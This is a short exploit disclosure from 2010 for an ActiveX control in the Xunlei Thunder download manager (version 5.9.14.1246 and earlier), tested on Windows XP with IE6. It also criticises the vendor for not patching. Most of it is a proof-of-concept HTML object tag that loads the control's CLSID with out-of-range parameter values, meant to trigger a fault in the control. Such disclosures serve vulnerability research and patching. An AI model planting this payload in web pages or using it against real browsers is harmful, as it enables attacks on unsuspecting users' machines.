# Date: 2010.01.17 # Author: superli # Software Link: http://down.sandai.net/Thunder5.9.14.1246.exe # Version: <= 5.9.14.1246 # Tested on: xpsp3 ie6 # Greeting to Xunlei Security Center guys,your guys still not yet release patch or new version to fix the vunl which also can #attack Xunlei KanKan Player(http://dl.xunlei.com/xmp.html).I exposed this vunl two weeks ago,are you really responsible for the security of millions users? # POC Code : <object id=ooxooxx classid="CLSID:{F3E70CEA-956E-49CC-B444-73AFE593AD7F}"> <PARAM NAME="_cx" VALUE="0xFFFFFFFF"> <PARAM NAME="_cy" VALUE="0xFFFFFFFF"> <PARAM NAME="UiMode" VALUE="-1"> <PARAM NAME="InnerPlayerType" VALUE="-1"> </object>